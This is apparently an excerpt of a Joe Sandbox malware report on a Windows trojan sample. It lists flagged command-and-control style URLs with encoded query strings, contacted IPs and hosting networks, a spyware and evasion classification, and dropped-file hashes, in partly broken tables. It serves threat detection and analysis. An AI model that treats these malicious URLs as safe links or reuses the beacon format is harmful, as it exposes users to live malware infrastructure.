http://thedivinerudraksha.com/u2kb/?pJ=y0bMVGhK3R&s7=im5SXjRwbJIZeY2yeMVWNNnKg99Etck2UhYi2fNZ2Kf/X7l | 100% | Avira URL Cloud | malware |
http://www.bitservicesltd.com/u2kb/?pJ=y0bMVGhK3R&s7=rr+sOBvEXsBdGevUkZEAvniGWrNxzC1YNHmXivr92FQhRIIYsedRhL+YGaN2VCieGtjtLTUTzUqxDX3Wf7Wl2JIBHu0WW9vDmQ== | 100% | Avira URL Cloud | malware |
http://www.thedivinerudraksha.com/u2kb/?pJ=y0bMVGhK3R&s7=im5SXjRwbJIZeY2yeMVWNNnKg99Etck2UhYi2fNZ2Kf/X7lq2SPR1Q6pROq8Gck3yLtOH/fXnE++yuD9U7pi0eI0K5lBX7KNLg== | 100% | Avira URL Cloud | malware |
http://www.energyservicestation.com/u2kb/www.energyservicestation.com | 100% | Avira URL Cloud | malware |
http://www.un-object.com/u2kb/ | 100% | Avira URL Cloud | malware |
http://www.energyservicestation.com/u2kb/ | 100% | Avira URL Cloud | malware |
http://www.white-hat.uk | 0% | Avira URL Cloud | safe |
http://www.dzyngiri.com | 0% | Avira URL Cloud | safe |
http://www.employerseervices.com/u2kb/www.employerseervices.com | 0% | Avira URL Cloud | safe |
http://www.younrock.com/u2kb/?s7=05tPwqSdqXO2xf32BHQi8E1nUfoFa2c80hhB3sQ3FFDNPs5AZDU6EjUymll22Wm6Scj5xbzg3GdXyuHgSKq8rTPQW1vWIa2Wug==&pJ=y0bMVGhK3R | 100% | Avira URL Cloud | malware |
http://www.avisrezervee.com | 0% | Avira URL Cloud | safe |
http://www.mygloballojistik.online/u2kb/ | 0% | Avira URL Cloud | safe |
http://www.bitservicesltd.com | 0% | Avira URL Cloud | safe |
http://justinmezzell.com | 0% | Avira URL Cloud | safe |
http://www.thewildphotographer.co.uk/u2kb/ | 100% | Avira URL Cloud | malware |
http://www.gritslab.com | 0% | Avira URL Cloud | safe |
http://www.white-hat.uk/u2kb/ | 100% | Avira URL Cloud | malware |
https://alldomains.hosting/domain-registrieren.html | 0% | Avira URL Cloud | safe |
http://www.bitservicesltd.com/u2kb/ | 100% | Avira URL Cloud | malware |
http://www.thewildphotographer.co.uk | 0% | Avira URL Cloud | safe |
http://www.fclaimrewardccpointq.shop/u2kb/www.fclaimrewardccpointq.shop | 100% | Avira URL Cloud | malware |
http://www.222ambking.org/u2kb/www.222ambking.org | 100% | Avira URL Cloud | malware |
http://www.gritslab.com/u2kb/ | 100% | Avira URL Cloud | malware |
http://www.employerseervices.com/u2kb/ | 0% | Avira URL Cloud | safe |
http://www.fclaimrewardccpointq.shop/u2kb/ | 100% | Avira URL Cloud | malware |
http://www.energyservicestation.com | 0% | Avira URL Cloud | safe |
http://www.gritslab.com/u2kb/?s7=ydCzFiH7iMWnz6xHMre3IWaEcfnK5+fYQUsmgPEoYCSsyD6HgT3yZXCBsea1O+OKnOGwPNRrrKn2ANadQmZjx8zjtO3/lmb0Gg==&pJ=y0bMVGhK3R | 100% | Avira URL Cloud | malware |
http://www.younrock.com | 0% | Avira URL Cloud | safe |
https://alldomains.hosting/e-mail-server.html | 0% | Avira URL Cloud | safe |
http://www.younrock.com/u2kb/?ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4c | 100% | Avira URL Cloud | malware |
http://www.shapshit.xyz/u2kb/?s7=Yd5Rzn4EVOpL1Cl/e5Amzdaa+E7UlYBpl8BtE0ZhlgLGbR5cH1Fns9iDSFPM0EqDoX1il4mP+EMsdt2zebBtiTAOJDfFAse6Fg==&pJ=y0bMVGhK3R | 100% | Avira URL Cloud | malware |
http://www.un-object.com/u2kb/?pJ=y0bMVGhK3R&s7=pRDkJdNDOVoQCU+9NHQShuJ8RlIM2fjCZpxzdvjpnmqfDHzh6n+FGyromdVZx0/+Z3ctR0ZwX+ep4hJ0NBR+2QmcJmTx4hb/kQ== | 100% | Avira URL Cloud | malware |
http://www.un-object.com/u2kb/www.un-object.com | 100% | Avira URL Cloud | malware |
http://white-hat.uk/u2kb/?pJ=y0bMVGhK3R&s7=PXfMycAZpTAipct8YsIgv6PR3Y11yPgF2k7967nf/qU1A0mUqq9Jy2mfr | 100% | Avira URL Cloud | malware |
http://www.thedivinerudraksha.com/u2kb/www.thedivinerudraksha.com | 100% | Avira URL Cloud | malware |
http://www.fclaimrewardccpointq.shop | 100% | Avira URL Cloud | malware |
http://www.white-hat.uk/u2kb/?pJ=y0bMVGhK3R&s7=PXfMycAZpTAipct8YsIgv6PR3Y11yPgF2k7967nf/qU1A0mUqq9Jy2mfr4kURdfD0IyZUuXLnrTzZCke5/3tklxZoaLCmex8cw== | 100% | Avira URL Cloud | malware |
http://www.shapshit.xyz/u2kb/ | 100% | Avira URL Cloud | malware |
http://www.mygloballojistik.online/u2kb/www.mygloballojistik.online | 0% | Avira URL Cloud | safe |
https://alldomains.hosting/ | 0% | Avira URL Cloud | safe |
http://www.ecomofietsen.com/u2kb/ | 100% | Avira URL Cloud | malware |
http://www.avisrezervee.com/u2kb/ | 100% | Avira URL Cloud | malware |
https://alldomains.hosting/hosting-webhosting.html | 0% | Avira URL Cloud | safe |
http://www.germanreps.com/u2kb/www.germanreps.com | 100% | Avira URL Cloud | malware |
http://www.younrock.com/u2kb/www.younrock.com | 100% | Avira URL Cloud | malware |
http://www.222ambking.org/u2kb/?s7=IEUpLmGg2fqLmrhwDd0CH8vm0i8ubOQDFcodV2ACJcW4bHSQscR3aN4MRDv2q1O0g2vnwuasF99orDvyVUesQZcBXW4MNpIrrg==&pJ=y0bMVGhK3R | 100% | Avira URL Cloud | malware |
http://www.222ambking.org | 0% | Avira URL Cloud | safe |
http://www.germanreps.com/u2kb/ | 100% | Avira URL Cloud | malware |
http://www.222ambking.org/u2kb/ | 100% | Avira URL Cloud | malware |
http://www.employerseervices.com | 0% | Avira URL Cloud | safe |
http://www.shapshit.xyz/u2kb/www.shapshit.xyz | 100% | Avira URL Cloud | malware |
http://www.un-object.com | 0% | Avira URL Cloud | safe |
http://www.younrock.com/u2kb/ | 100% | Avira URL Cloud | malware |
http://www.ecomofietsen.com/u2kb/www.ecomofietsen.com | 100% | Avira URL Cloud | malware |
http://www.bitservicesltd.com/u2kb/www.bitservicesltd.com | 100% | Avira URL Cloud | malware |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.bitservicesltd.com | 161.97.163.8 | true | true | | unknown
www.younrock.com | 81.17.18.198 | true | true | | unknown
www.energyservicestation.com | 213.145.228.111 | true | true | | unknown
www.thewildphotographer.co.uk | 45.33.30.197 | true | true | | unknown
www.shapshit.xyz | 199.192.30.147 | true | true | | unknown
www.222ambking.org | 91.195.240.94 | true | true | | unknown
thedivinerudraksha.com | 85.187.128.34 | true | true | | unknown
un-object.com | 192.185.17.12 | true | true | | unknown
white-hat.uk | 94.176.104.86 | true | true | | unknown
gritslab.com | 78.141.192.145 | true | true | | unknown
www.un-object.com | unknown | unknown | true | | unknown
www.white-hat.uk | unknown | unknown | true | | unknown
www.gritslab.com | unknown | unknown | true | | unknown
www.thedivinerudraksha.com | unknown | unknown | true | | unknown
www.fclaimrewardccpointq.shop | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.energyservicestation.com/u2kb/?pJ=y0bMVGhK3R&s7=IK59b/MdFRha+CUVMWpzDpHQ2riuD6F66TLC1fPPNwLnZq29gpb12AWvlZbo17UEh0sBgFvevrMQsuZfYKuNRicmmGgsJT37Uw== | true | Avira URL Cloud: malware | unknown
http://www.thedivinerudraksha.com/u2kb/ | true | 1%, Virustotal, Browse; Avira URL Cloud: malware | unknown
http://www.bitservicesltd.com/u2kb/?pJ=y0bMVGhK3R&s7=rr+sOBvEXsBdGevUkZEAvniGWrNxzC1YNHmXivr92FQhRIIYsedRhL+YGaN2VCieGtjtLTUTzUqxDX3Wf7Wl2JIBHu0WW9vDmQ== | true | Avira URL Cloud: malware | unknown
http://www.thedivinerudraksha.com/u2kb/?pJ=y0bMVGhK3R&s7=im5SXjRwbJIZeY2yeMVWNNnKg99Etck2UhYi2fNZ2Kf/X7lq2SPR1Q6pROq8Gck3yLtOH/fXnE++yuD9U7pi0eI0K5lBX7KNLg== | true | Avira URL Cloud: malware | unknown
http://www.energyservicestation.com/u2kb/ | true | Avira URL Cloud: malware | unknown
http://www.un-object.com/u2kb/ | true | Avira URL Cloud: malware | unknown
http://www.younrock.com/u2kb/?s7=05tPwqSdqXO2xf32BHQi8E1nUfoFa2c80hhB3sQ3FFDNPs5AZDU6EjUymll22Wm6Scj5xbzg3GdXyuHgSKq8rTPQW1vWIa2Wug==&pJ=y0bMVGhK3R | true | Avira URL Cloud: malware | unknown
http://www.thewildphotographer.co.uk/u2kb/ | true | Avira URL Cloud: malware | unknown
http://www.bitservicesltd.com/u2kb/ | true | Avira URL Cloud: malware | unknown
http://www.gritslab.com/u2kb/ | true | Avira URL Cloud: malware | unknown
http://www.gritslab.com/u2kb/?s7=ydCzFiH7iMWnz6xHMre3IWaEcfnK5+fYQUsmgPEoYCSsyD6HgT3yZXCBsea1O+OKnOGwPNRrrKn2ANadQmZjx8zjtO3/lmb0Gg==&pJ=y0bMVGhK3R | true | Avira URL Cloud: malware | unknown
http://www.un-object.com/u2kb/?pJ=y0bMVGhK3R&s7=pRDkJdNDOVoQCU+9NHQShuJ8RlIM2fjCZpxzdvjpnmqfDHzh6n+FGyromdVZx0/+Z3ctR0ZwX+ep4hJ0NBR+2QmcJmTx4hb/kQ== | true | Avira URL Cloud: malware | unknown
http://www.shapshit.xyz/u2kb/?s7=Yd5Rzn4EVOpL1Cl/e5Amzdaa+E7UlYBpl8BtE0ZhlgLGbR5cH1Fns9iDSFPM0EqDoX1il4mP+EMsdt2zebBtiTAOJDfFAse6Fg==&pJ=y0bMVGhK3R | true | Avira URL Cloud: malware | unknown
http://www.white-hat.uk/u2kb/?pJ=y0bMVGhK3R&s7=PXfMycAZpTAipct8YsIgv6PR3Y11yPgF2k7967nf/qU1A0mUqq9Jy2mfr4kURdfD0IyZUuXLnrTzZCke5/3tklxZoaLCmex8cw== | true | Avira URL Cloud: malware | unknown
http://www.shapshit.xyz/u2kb/ | true | Avira URL Cloud: malware | unknown
http://www.222ambking.org/u2kb/?s7=IEUpLmGg2fqLmrhwDd0CH8vm0i8ubOQDFcodV2ACJcW4bHSQscR3aN4MRDv2q1O0g2vnwuasF99orDvyVUesQZcBXW4MNpIrrg==&pJ=y0bMVGhK3R | true | Avira URL Cloud: malware | unknown
http://www.222ambking.org/u2kb/ | true | Avira URL Cloud: malware | unknown
http://www.younrock.com/u2kb/ | true | Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | cmd.exe, 00000005.00000003.393433818.000000000320B000.00000004.00000020.00020000.00000000.sdmp, HI4NJ046K.5.dr | false | | high
http://www.avisrezervee.com/u2kb/www.avisrezervee.com | explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://duckduckgo.com/ac/?q= | HI4NJ046K.5.dr | false | | high
http://www.gritslab.com/u2kb/www.gritslab.com | explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://www.name.com/domain/renew/222ambking.org?utm_source=Sedo_parked_page&utm_medium=button&utm_c | cmd.exe, 00000005.00000002.569647158.0000000005FE0000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://img.sedoparking.com | explorer.exe, 00000004.00000002.580448726.00000000150CC000.00000004.80000000.00040000.00000000.sdmp, cmd.exe, 00000005.00000002.569051526.00000000042BC000.00000004.10000000.00040000.00000000.sdmp, cmd.exe, 00000005.00000002.569647158.0000000005FE0000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://search.yahoo.com?fr=crmas_sfpf | cmd.exe, 00000005.00000003.393433818.000000000320B000.00000004.00000020.00020000.00000000.sdmp, HI4NJ046K.5.dr | false | | high
http://www.thewildphotographer.co.uk/u2kb/www.thewildphotographer.co.uk | explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://www.mygloballojistik.online | explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.shapshit.xyz | explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.germanreps.com | explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://thedivinerudraksha.com/u2kb/?pJ=y0bMVGhK3R&s7=im5SXjRwbJIZeY2yeMVWNNnKg99Etck2UhYi2fNZ2Kf/X7l | explorer.exe, 00000004.00000002.580448726.00000000158A6000.00000004.80000000.00040000.00000000.sdmp, cmd.exe, 00000005.00000002.569051526.0000000004A96000.00000004.10000000.00040000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://www.ecomofietsen.com | explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.thedivinerudraksha.com | explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.white-hat.uk/u2kb/www.white-hat.uk | explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://www.energyservicestation.com/u2kb/www.energyservicestation.com | explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://www.white-hat.uk | explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.employerseervices.com/u2kb/www.employerseervices.com | explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.dzyngiri.com | explorer.exe, 00000004.00000002.580448726.0000000015714000.00000004.80000000.00040000.00000000.sdmp, cmd.exe, 00000005.00000002.569051526.0000000004904000.00000004.10000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.mygloballojistik.online/u2kb/ | explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.avisrezervee.com | explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.bitservicesltd.com | explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://justinmezzell.com | explorer.exe, 00000004.00000002.580448726.0000000015714000.00000004.80000000.00040000.00000000.sdmp, cmd.exe, 00000005.00000002.569051526.0000000004904000.00000004.10000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.white-hat.uk/u2kb/ | explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://alldomains.hosting/domain-registrieren.html | explorer.exe, 00000004.00000002.580448726.000000001525E000.00000004.80000000.00040000.00000000.sdmp, cmd.exe, 00000005.00000002.569051526.000000000444E000.00000004.10000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.gritslab.com | explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.thewildphotographer.co.uk | explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fclaimrewardccpointq.shop/u2kb/www.fclaimrewardccpointq.shop | explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://www.222ambking.org/u2kb/www.222ambking.org | explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://www.fclaimrewardccpointq.shop/u2kb/ | explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://www.autoitscript.com/autoit3/J | explorer.exe, 00000004.00000000.327263504.0000000008260000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://www.name.com/domain/rene | explorer.exe, 00000004.00000002.580448726.00000000150CC000.00000004.80000000.00040000.00000000.sdmp, cmd.exe, 00000005.00000002.569051526.00000000042BC000.00000004.10000000.00040000.00000000.sdmp | false | | high
http://www.energyservicestation.com | explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | cmd.exe, 00000005.00000003.393433818.000000000320B000.00000004.00000020.00020000.00000000.sdmp, HI4NJ046K.5.dr | false | | high
http://www.employerseervices.com/u2kb/ | explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://alldomains.hosting/e-mail-server.html | explorer.exe, 00000004.00000002.580448726.000000001525E000.00000004.80000000.00040000.00000000.sdmp, cmd.exe, 00000005.00000002.569051526.000000000444E000.00000004.10000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.younrock.com/u2kb/?ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4c | cmd.exe, 00000005.00000002.569647158.0000000005FE0000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://www.younrock.com | explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | HI4NJ046K.5.dr | false | | high
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search | cmd.exe, 00000005.00000003.393433818.000000000320B000.00000004.00000020.00020000.00000000.sdmp, HI4NJ046K.5.dr | false | | high
http://nsis.sf.net/NSIS_ErrorError | SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe | false | | high
http://www.un-object.com/u2kb/www.un-object.com | explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://white-hat.uk/u2kb/?pJ=y0bMVGhK3R&s7=PXfMycAZpTAipct8YsIgv6PR3Y11yPgF2k7967nf/qU1A0mUqq9Jy2mfr | explorer.exe, 00000004.00000002.580448726.0000000014C16000.00000004.80000000.00040000.00000000.sdmp, cmd.exe, 00000005.00000002.569051526.0000000003E06000.00000004.10000000.00040000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://www.avisrezervee.com/u2kb/ | explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://www.mygloballojistik.online/u2kb/www.mygloballojistik.online | explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command= | cmd.exe, 00000005.00000003.393433818.000000000320B000.00000004.00000020.00020000.00000000.sdmp, HI4NJ046K.5.dr | false | | high
http://www.thedivinerudraksha.com/u2kb/www.thedivinerudraksha.com | explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://alldomains.hosting/ | explorer.exe, 00000004.00000002.580448726.000000001525E000.00000004.80000000.00040000.00000000.sdmp, cmd.exe, 00000005.00000002.569051526.000000000444E000.00000004.10000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fclaimrewardccpointq.shop | explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://www.sedo.com/services/parking.php3 | cmd.exe, 00000005.00000002.569647158.0000000005FE0000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ac.ecosia.org/autocomplete?q= | HI4NJ046K.5.dr | false | | high
https://search.yahoo.com?fr=crmas_sfp | cmd.exe, 00000005.00000003.393433818.000000000320B000.00000004.00000020.00020000.00000000.sdmp, HI4NJ046K.5.dr | false | | high
http://www.ecomofietsen.com/u2kb/ | explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://alldomains.hosting/hosting-webhosting.html | cmd.exe, 00000005.00000002.569051526.000000000444E000.00000004.10000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.germanreps.com/u2kb/www.germanreps.com | explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://www.germanreps.com/u2kb/ | explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://www.employerseervices.com | explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp | false | |
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://www.younrock.com/u2kb/www.younrock.comexplorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: malware
                                                                  unknown
                                                                  http://www.222ambking.orgexplorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://www.shapshit.xyz/u2kb/www.shapshit.xyzexplorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: malware
                                                                  unknown
                                                                  http://www.ecomofietsen.com/u2kb/www.ecomofietsen.comexplorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: malware
                                                                  unknown
                                                                  http://www.un-object.comexplorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=HI4NJ046K.5.drfalse
                                                                    high
                                                                    http://www.bitservicesltd.com/u2kb/www.bitservicesltd.comexplorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: malware
                                                                    unknown
IP               Domain                         Country        ASN    ASN Name                             Malicious
85.187.128.34    thedivinerudraksha.com         United States  55293  A2HOSTINGUS                          true
91.195.240.94    www.222ambking.org             Germany        47846  SEDO-ASDE                            true
45.33.30.197     www.thewildphotographer.co.uk  United States  63949  LINODE-APLinodeLLCUS                 true
78.141.192.145   gritslab.com                   France         20473  AS-CHOOPAUS                          true
161.97.163.8     www.bitservicesltd.com         United States  51167  CONTABODE                            true
81.17.18.198     www.younrock.com               Switzerland    51852  PLI-ASCH                             true
192.185.17.12    un-object.com                  United States  46606  UNIFIEDLAYER-AS-1US                  true
94.176.104.86    white-hat.uk                   Romania        5588   GTSCEGTSCentralEuropeAntelGermanyCZ  true
213.145.228.111  www.energyservicestation.com   Austria        25575  DOMAINTECHNIKAT                      true
199.192.30.147   www.shapshit.xyz               United States  22612  NAMECHEAP-NETUS                      true
                                                                    Joe Sandbox Version:37.0.0 Beryl
                                                                    Analysis ID:830750
                                                                    Start date and time:2023-03-20 16:58:12 +01:00
                                                                    Joe Sandbox Product:CloudBasic
                                                                    Overall analysis duration:0h 12m 23s
                                                                    Hypervisor based Inspection enabled:false
                                                                    Report type:light
                                                                    Cookbook file name:default.jbs
                                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:10
                                                                    Number of new started drivers analysed:0
                                                                    Number of existing processes analysed:0
                                                                    Number of existing drivers analysed:0
                                                                    Number of injected processes analysed:1
                                                                    Technologies:
                                                                    • HCA enabled
                                                                    • EGA enabled
                                                                    • HDC enabled
                                                                    • AMSI enabled
                                                                    Analysis Mode:default
                                                                    Analysis stop reason:Timeout
                                                                    Sample file name:SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe
                                                                    Detection:MAL
                                                                    Classification:mal100.troj.spyw.evad.winEXE@8/5@12/10
                                                                    EGA Information:
                                                                    • Successful, ratio: 100%
                                                                    HDC Information:
                                                                    • Successful, ratio: 80.6% (good quality ratio 73.9%)
                                                                    • Quality average: 74.7%
                                                                    • Quality standard deviation: 31.2%
                                                                    HCA Information:
                                                                    • Successful, ratio: 100%
                                                                    • Number of executed functions: 0
                                                                    • Number of non-executed functions: 0
                                                                    Cookbook Comments:
                                                                    • Found application associated with file extension: .exe
                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe
                                                                    • TCP Packets have been reduced to 100
• Not all processes were analyzed, report is missing behavior information
                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
Time      Type             Description
17:00:00  API Interceptor  498x Sleep call for process: explorer.exe modified
                                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):94208
                                                                    Entropy (8bit):1.2880737026424216
                                                                    Encrypted:false
                                                                    SSDEEP:192:Qo1/8dpUXbSzTPJPQ6YVucbj8Ewn7PrH944:QS/inojVucbj8Ewn7b944
                                                                    MD5:5F02C426BCF0D3E3DC81F002F9125663
                                                                    SHA1:EA50920666E30250E4BE05194FA7B3F44967BE94
                                                                    SHA-256:DF93CD763CFEC79473D0DCF58C77D45C99D246CE347652BF215A97D8D1267EFA
                                                                    SHA-512:53EFE8F752484B48C39E1ABFBA05840FF2B968DE2BCAE16287877F69BABE8C54617E76C6953A22789043E27C9CCA9DB4FED5D2C2A512CBDDB5015F4CAB57C198
                                                                    Malicious:false
                                                                    Reputation:high, very likely benign file
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):5738
                                                                    Entropy (8bit):7.164987839661835
                                                                    Encrypted:false
